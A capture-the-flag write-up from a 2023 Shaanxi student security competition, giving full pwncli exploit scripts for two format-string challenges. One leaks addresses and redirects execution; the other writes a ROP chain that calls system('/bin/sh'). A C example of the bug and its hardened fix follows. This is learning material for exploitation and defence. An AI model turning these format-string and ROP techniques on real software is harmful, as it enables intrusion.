2023 Third Shaanxi Provincial College Student Cyber Security Skills Competition - pwn - may be all?
Preface
The school team tossed me two challenges; I had a look and both are easy ones, so I did them quickly. I don't know their actual names, so I'll just call them pwn1 and pwn2.
pwn1
A simple format-string leak. Apart from the variable offset being different in the remote docker, there is not much to say. (The challenge author's docker may have been broken.)
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-06-03 13:55:30
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()

io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename = gift.filename  # current filename
is_debug = gift.debug  # is debug or not
is_remote = gift.remote  # is remote or not
gdb_pid = gift.gdb_pid  # gdb pid if debug

# leak a code address through the format string (offset 19 locally;
# the remote docker used a different offset)
sla('choice :', '2')
sla('Terra_Cotta_Warriors\n', '%19$p')
leak_elf = int(rl()[:-1], 16)
leak_ex2(leak_elf)
eb = leak_elf - elf.sym.main  # ELF base
leak_ex2(eb)

sla('choice :', '1')
sl(flat({40: eb + 0x129a}))
ia()
pwn2
A simple format string. Modify the rbp chain, then, since the variable i and the return address of __libc_start_main are in the same page, keep rewriting the value of i while writing a ROP chain over the __libc_start_main return address. Finally restore rbp. (Thinking about it more carefully now, using the bss section together with the rbp overwrite it should be possible to pivot the stack straight onto bss, which might be a bit more convenient?)
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:2023-06-03 14:06:17
Usage:
    Debug : python3 exp.py debug elf-file-path -t -b malloc
    Remote: python3 exp.py remote elf-file-path ip:port
'''
from pwncli import *
cli_script()

io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

filename = gift.filename  # current filename
is_debug = gift.debug  # is debug or not
is_remote = gift.remote  # is remote or not
gdb_pid = gift.gdb_pid  # gdb pid if debug


def attack_8_bits(val, attack_addr, i_addr):
    # Write `val` to `attack_addr` one byte at a time (6 bytes are enough for
    # a userland address) through the rbp chain: arg 8 points at arg 10, so
    # arg 8 selects the target byte and arg 10 writes it. After each byte the
    # loop variable i is reset to 0 with %n so the program keeps looping.
    for i in range(6):
        pd = flat({
            0: '%' + str(attack_addr + i & 0xff) + 'c' + '%8$hhn',
            0x40: ''
        }, filler='\x00')
        sa('say?\n', pd)
        pd = flat({
            0: '%' + str(val & 0xff) + 'c' + '%10$hhn',
            0x40: ''
        }, filler='\x00')
        sa('say?\n', pd)
        sleep(0.05)
        pd = flat({
            0: '%' + str(i_addr & 0xff) + 'c' + '%8$hhn',
            0x40: ''
        }, filler='\x00')
        sa('say?\n', pd)
        pd = flat({
            0: '%10$n',
            0x40: ''
        }, filler='\x00')
        sa('say?\n', pd)
        val = val >> 8


pd = flat({0x0: 'TokameinE_is_the_best_pwner\x00\x00'}, filler='\x00')
sa('is?\n', pd)

# leak a libc address and a stack address with one format string
pd = flat({0: '%29$p-%8$p-'})
sa('say?\n', pd)
sleep(0.05)
leak_libc = int(ru('-')[:-1], 16)
leak_ex2(leak_libc)
lb = leak_libc - 0x20840
libc.address = lb
leak_ex2(lb)
leak_stack = int(ru('-')[:-1], 16)
leak_ex2(leak_stack)

attack_stack = leak_stack + 0x98  # return address into __libc_start_main
ori_ebp = leak_stack + 0x90       # saved rbp to restore at the end
i_addr = leak_stack - 0x14        # the loop variable i

# write the ROP chain: pop rdi; "/bin/sh"; system
pop_rdi = CurrentGadgets.pop_rdi_ret()
attack_8_bits(pop_rdi, attack_stack, i_addr)
attack_8_bits(CurrentGadgets.bin_sh(), attack_stack + 8, i_addr)
attack_8_bits(libc.sym.system, attack_stack + 0x10, i_addr)

# restore the original rbp, then let the remaining loop iterations run out
pd = flat({
    0: '%' + str(ori_ebp & 0xff) + 'c' + '%8$hhn',
    0x40: ''
}, filler='\x00')
sa('say?\n', pd)
for i in range(12):
    sa('say?\n', p64(0xdeadbeef))
ia()
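Both challenges come down to the same defect: user text reaches a printf-family call as the format string, which is what lets `%19$p` read stack slots and `%8$hhn` write bytes. The following is an added example, not code from the write-up or the challenge binaries, showing that vulnerable pattern beside the hardened form; the function names are made up for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern (the bug class in both challenges): user text becomes the
 * format string, so "%19$p" reads a stack slot and "%8$hhn" writes a byte
 * through whatever pointer sits in that argument slot. Shown only as the
 * "before"; never pass untrusted input to it.
 * gcc -Wformat -Wformat-security flags this call ("format not a string literal"). */
int echo_vulnerable(char *out, size_t n, const char *user)
{
    return snprintf(out, n, user);  /* BUG: user-controlled format */
}

/* Hardened form: constant format, user text is a "%s" argument, so every '%'
 * in it is copied literally and no directive is ever interpreted. */
int echo_safe(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "%s", user);
}

/* For wrappers that legitimately take a format: the attribute lets -Wformat
 * type-check every caller, and -Werror=format-security rejects callers that
 * pass a non-literal format. (Hypothetical helper name.) */
__attribute__((format(printf, 3, 4)))
int echo_fmt(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Regression check: returns 1 when the hardened path reproduces the input
 * byte for byte, i.e. the leak/write directives stayed plain text. */
int user_text_is_literal(const char *user)
{
    char buf[128];
    int written = echo_safe(buf, sizeof buf, user);
    return written == (int)strlen(user) && strcmp(buf, user) == 0;
}
```

Beyond compiler warnings, building with glibc's `_FORTIFY_SOURCE=2` makes `__printf_chk` abort when `%n` is used with a format string that lives in writable memory, which would have stopped the `%hhn`/`%n` writes used in pwn2 even if the format bug itself remained.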
From: https://www.cnblogs.com/7resp4ss/p/17455559.html